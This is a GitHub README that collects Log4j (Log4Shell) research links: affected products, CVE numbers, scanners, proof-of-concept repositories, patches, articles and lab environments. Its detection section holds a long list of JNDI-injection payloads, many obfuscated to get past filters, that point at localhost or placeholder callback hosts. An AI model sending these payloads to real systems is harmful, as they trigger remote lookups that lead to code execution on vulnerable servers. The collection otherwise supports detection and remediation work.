├── README.md
└── TEMP
    └── wx.png

/README.md:
--------------------------------------------------------------------------------
# HackLog4j - The Eternal Evil Dragon

This project pays tribute to the most invincible Java logging library in the universe! It also records material I came across while studying the Log4j vulnerabilities. The project will be updated continuously; it was created on December 10, 2021, and was last updated on December 27, 2022. Author: [0e0w](https://github.com/0e0w)

- [00-Log4j Eternal Dragon](https://github.com/HackJava/HackLog4j2#00-log4j%E6%B0%B8%E6%81%92%E6%81%B6%E9%BE%99)
- [01-Log4j Basics](https://github.com/HackJava/HackLog4j2#01-log4j%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86)
- [02-Log4j Framework Identification](https://github.com/HackJava/HackLog4j2#02-log4j%E6%A1%86%E6%9E%B6%E8%AF%86%E5%88%AB)
- [03-Software Built on Log4j](https://github.com/HackJava/HackLog4j2#03-log4j%E4%B8%8A%E5%B1%82%E5%BB%BA%E7%AD%91)
- [04-Log4j Vulnerability Summary](https://github.com/HackJava/HackLog4j2#04-log4j%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB)
- [05-Log4j Detection and Exploitation](https://github.com/HackJava/HackLog4j2#05-log4j%E6%A3%80%E6%B5%8B%E5%88%A9%E7%94%A8)
- [06-Log4j Vulnerability Remediation](https://github.com/HackJava/HackLog4j2#06-log4j%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D)
- [07-Log4j Analysis Articles](https://github.com/HackJava/HackLog4j2#07-log4j%E5%88%86%E6%9E%90%E6%96%87%E7%AB%A0)
- [08-Log4j Lab Environments](https://github.com/HackJava/HackLog4j2#08-log4j%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83)

## 00-Log4j Eternal Dragon

- https://github.com/Goqi/ELong

## 01-Log4j Basics

- https://github.com/apache/logging-log4j2

## 02-Log4j Framework Identification

- To be updated

## 03-Software Built on Log4j

**log4j + ? = rce !**

- [x] Apache Flink
- [x] Apache Struts2
- [ ] Apache Spark
- [x] Apache Storm
- [ ] Apache Tomcat
- [x] Apache Solr
- [ ] Apache Dubbo
- [ ] Apache Druid
- [x] Apache OFBiz
- [ ] Apache Flume
- [ ] Redis
- [ ] Logstash
- [ ] ElasticSearch
- [ ] Apache Kafka
- [ ] Ghidra
- [ ] Spring-Boot-starter-log4j2
- [ ] VMware vCenter
- [ ] Minecraft
- [x] hikvision
- ......
- https://fofa.so/static_pages/log4j2
- https://github.com/cisagov/log4j-affected-db
- https://github.com/YfryTchsGD/Log4jAttackSurface
- https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
- https://github.com/CrackerCat/Log4jAttackSurface
- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages
- https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html
- https://github.com/authomize/log4j-log4shell-affected
- https://github.com/NS-Sp4ce/Vm4J
- https://github.com/dinosn/hikvision

## 04-Log4j Vulnerability Summary

- CVE-2021-45105
- CVE-2021-44228
- CVE-2021-4104
- CVE-2019-17571
- CVE-2017-5645

## 05-Log4j Detection and Exploitation

How can you determine whether a website is affected by the Log4j JNDI injection vulnerability? How can you find Log4j JNDI injection vulnerabilities on an internal network?

1. Payload

```
${jndi:ldap://127.0.0.1/poc}
${jndi:rmi://127.0.0.1/poc}
${jndi:dns://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
$%7Bjndi:ldap://127.0.0.1/poc%7D
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc}
${${::-j}ndi:rmi://k123.k123.k123/ass}
${jndi:rmi://k8.k123.k123}
${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc}
${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc}
j${loWer:Nd}i${uPper::}
${jndi:ldaps://127.0.0.1/poc}
${jndi:iiop://127.0.0.1/poc}
${date:ldap://127.0.0.1/poc}
${java:ldap://127.0.0.1/poc}
${marker:ldap://127.0.0.1/poc}
${ctx:ldap://127.0.0.1/poc}
${lower:ldap://127.0.0.1/poc}
${upper:ldap://127.0.0.1/poc}
${main:ldap://127.0.0.1/poc}
${jvmrunargs:ldap://127.0.0.1/poc}
${sys:ldap://127.0.0.1/poc}
${env:ldap://127.0.0.1/poc}
${log4j:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
${jndi:rmi://127.0.0.1}/
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}
${jndi:dns://127.0.0.1}
${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}
${jnd${upper:i}:ldap://127.0.0.1/poc}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${lower:jndi}:${lower:ldap}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:ldap}://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}p://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:ldap://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:rmi://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:ldap://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:rmi://127.0.0.1/poc}
${${::::::::::::::-j}ndi:ldap://127.0.0.1/poc}
${${::::::::::::::-j}ndi:rmi://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
```

- https://github.com/trickest/log4j
- https://github.com/test502git/log4j-fuzz-head-poc
- https://github.com/woodpecker-appstore/log4j-payload-generator
- https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

2. Source Code Detection

- https://github.com/google/log4jscanner
- https://github.com/hupe1980/scan4log4shell
- https://github.com/logpresso/CVE-2021-44228-Scanner
- https://github.com/xsultan/log4jshield
- https://github.com/Joefreedy/Log4j-Windows-Scanner
- https://github.com/back2root/log4shell-rex
- https://github.com/Neo23x0/log4shell-detector
- https://github.com/dwisiswant0/look4jar
- https://github.com/Qualys/log4jscanwin
- https://github.com/lijiejie/log4j2_vul_local_scanner
- https://github.com/palantir/log4j-sniffer
- https://github.com/mergebase/log4j-detector
- https://www.t00ls.cc/thread-63931-1-1.html
- https://github.com/darkarnium/Log4j-CVE-Detect
- https://github.com/whitesource/log4j-detect-distribution
- https://github.com/fox-it/log4j-finder
- https://github.com/webraybtl/Log4j

3. Detection With Outbound Connectivity

- https://github.com/dorkerdevil/Log-4-JAM
- https://github.com/adilsoybali/Log4j-RCE-Scanner
- https://github.com/cisagov/log4j-scanner

4. Detection Without Outbound Connectivity

- https://github.com/For-ACGN/Log4Shell
- https://github.com/proferosec/log4jScanner
- https://github.com/Y0-kan/Log4jShell-Scan
- https://github.com/j5s/Log4j2Scan
- https://github.com/EmYiQing/JNDIScan

5. Active Scanning

- https://github.com/ilsubyeega/log4j2-exploits
- https://github.com/Cyronlee/log4j-rce
- https://github.com/handbye/Log4j2Fuzz

6. Passive Scanning

- https://github.com/silentsignal/burp-log4shell
- https://github.com/pmiaowu/log4jScan
- https://github.com/guguyu1/log4j2_burp_scan
- https://github.com/whwlsfb/Log4j2Scan
- https://github.com/bigsizeme/Log4j-check
- https://github.com/f0ng/log4j2burpscanner
- https://github.com/pmiaowu/log4j2Scan
- https://github.com/bit4woo/log4jScan
- https://github.com/izj007/Log4j2Scan
- https://github.com/gh0stkey/Log4j2-RCE-Scanner
- https://github.com/p1n93r/Log4j2Scan
- https://github.com/mostwantedduck/BurpLog4j2Scan
- https://github.com/j3ers3/Log4Scan

7. Header Detection

- https://github.com/fullhunt/log4j-scan
- https://github.com/0xInfection/LogMePwn
- https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit

8. Request Parameter Detection

9. Other Tools

- https://github.com/dbgee/log4j2_rce
- https://github.com/ReadER-L/log4j-rce
- https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept
- https://github.com/Seayon/Log4j2RCE_Demo
- https://github.com/elbosso/Log4J2CustomJMXAppender
- https://github.com/ahus1/logging-and-tracing
- https://github.com/stuartwdouglas/log4j-jndi-agent
- https://github.com/xiajun325/apache-log4j-rce-poc
- https://github.com/caoli5288/log4j2jndiinterceptor
- https://github.com/y35uishere/Log4j2-CVE-2021-44228
- https://github.com/ErdbeerbaerLP/log4jfix
- https://github.com/0x0021h/apache-log4j-rce
- https://github.com/Gav06/RceFix
- https://github.com/UltraVanilla/LogJackFix
- https://github.com/iamsino/log4j2-Exp
- https://github.com/bkfish/Apache-Log4j-Learning
- https://github.com/LoliKingdom/NukeJndiLookupFromLog4j
- https://github.com/tangxiaofeng7/apache-log4j-poc
- https://github.com/h1b1ki/apache-log4j-poc
- https://github.com/EmptyIrony/Log4j2Fixer
- https://github.com/AzisabaNetwork/Log4j2Fix
- https://github.com/apple502j/Log4Jail
- https://github.com/jacobtread/L4J-Vuln-Patch
- https://github.com/stardust1900/log4j-2.15.0
- https://github.com/nest-x/nestx-log4js
- https://github.com/Marcelektro/Log4J-RCE-Implementation
- https://github.com/jdremillard/json-logging
- https://github.com/parayaluyanta/sell-logs-and-peace
- https://github.com/albar965/atools
- https://github.com/Al0sc/Log4j-rce
- https://github.com/ven0n1/Log4jv2Maven
- https://github.com/akunzai/log4j2-sendgrid-appender
- https://github.com/inbug-team/Log4j_RCE_Tool
- https://github.com/zlepper/CVE-2021-44228-Test-Server
- https://github.com/webraybtl/Log4j
- https://github.com/numanturle/Log4jNuclei
- https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
- https://github.com/kozmer/log4j-shell-poc
- https://github.com/hackerhackrat/Log4j2-RCE-burp-plugin
- https://github.com/mzlogin/CVE-2021-44228-Demo
- https://github.com/greymd/CVE-2021-44228
- https://github.com/Cybereason/Logout4Shell
- https://github.com/webraybtl/log4j-snort
- https://github.com/corretto/hotpatch-for-apache-log4j2
- https://github.com/alexandre-lavoie/python-log4rce
- https://github.com/hillu/local-log4j-vuln-scanner
- https://github.com/leonjza/log4jpwn
- https://github.com/cyberstruggle/L4sh
- https://github.com/cckuailong/log4shell_1.x
- https://github.com/zhzyker/logmap
- https://github.com/LoRexxar/log_dependency_checklist
- https://github.com/0xDexter0us/Log4J-Scanner
- https://github.com/cckuailong/Log4j_CVE-2021-45046
- https://github.com/KpLi0rn/Log4j2Scan
- https://github.com/righel/log4shell_nse
- https://github.com/Ch0pin/log4JFrida
- https://github.com/mycve/HTTPHeaderInjectBrowser
- https://github.com/ihebski/log4j-Scanner
- https://github.com/Yihsiwei/Log4j-exp
- https://github.com/rz7d/log4j-force-upgrader
- https://github.com/xsser/log4jdemoforRCE
- https://github.com/e5g/Log-4J-Exploit-Fix
- https://github.com/Re1own/Apache-log4j-POC
- https://github.com/jas502n/Log4j2-CVE-2021-44228
- https://github.com/ChloePrime/fix4log4j
- https://github.com/toString122/log4j2_exp
- https://github.com/shanfenglan/apache_log4j_poc
- https://github.com/dbgee/CVE-2021-44228
- https://github.com/lcosmos/apache-log4j-poc
- https://github.com/aalex954/Log4PowerShell
- https://github.com/fox-it/log4shell-pcaps
- https://github.com/Qerim-iseni09/ByeLog4Shell

## 06-Log4j Vulnerability Remediation

- https://github.com/360-CERT/Log4ShellPatch
- https://github.com/javasec/log4j-patch
- https://github.com/simonis/Log4jPatch
- https://github.com/FrankHeijden/Log4jFix
- https://github.com/Szczurowsky/Log4j-0Day-Fix
- https://github.com/SumoLogic/sumologic-log4j2-appender
- https://github.com/chaitin/log4j2-vaccine
- https://github.com/zhangyoufu/log4j2-without-jndi
- https://github.com/CreeperHost/Log4jPatcher
- https://github.com/boundaryx/cloudrasp-log4j2
- https://github.com/DichuuCraft/LOG4J2-3201-fix

## 07-Log4j Analysis Articles

- https://mp.weixin.qq.com/s/4cvooT4tfQhjL7t4GFzYFQ
- https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ
- https://mp.weixin.qq.com/s/nOmQFq4KxM9AZ_HYIq1_CQ
- https://mp.weixin.qq.com/s/K74c1pTG6m5rKFuKaIYmPg
- https://mp.weixin.qq.com/s/AWhV-QdkQ6i2IEZSVhe-Kg
- https://mp.weixin.qq.com/s/iHqwL6jslyCV_0jtdVj82A
- https://lorexxar.cn/2021/12/10/log4j2-jndi
- https://www.t00ls.cc/thread-63705-1-1.html
- https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg

## 08-Log4j Lab Environments

- https://hub.docker.com/u/vulfocus
- https://github.com/jweny/log4j-web-env
- https://github.com/fengxuangit/log4j_vuln
- https://www.t00ls.cc/thread-63695-1-1.html
- https://github.com/christophetd/log4shell-vulnerable-app
- https://github.com/Adikso/minecraft-log4j-honeypot
- https://github.com/try777-try777/reVul-apache-log4j2-rec
- https://github.com/EmYiQing/Log4j2DoS
- https://github.com/tothi/log4shell-vulnerable-app
- https://github.com/Anonymous-ghost/log4jVul
- https://github.com/cyberxml/log4j-poc

![](TEMP/wx.png)

[![Stargazers over time](https://starchart.cc//0e0w/HackLog4j.svg)](https://starchart.cc/0e0w/HackLog4j)

--------------------------------------------------------------------------------
/TEMP/wx.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HackJava/Log4j2/c209591086a980e86bb035e70eae7e70832adb17/TEMP/wx.png --------------------------------------------------------------------------------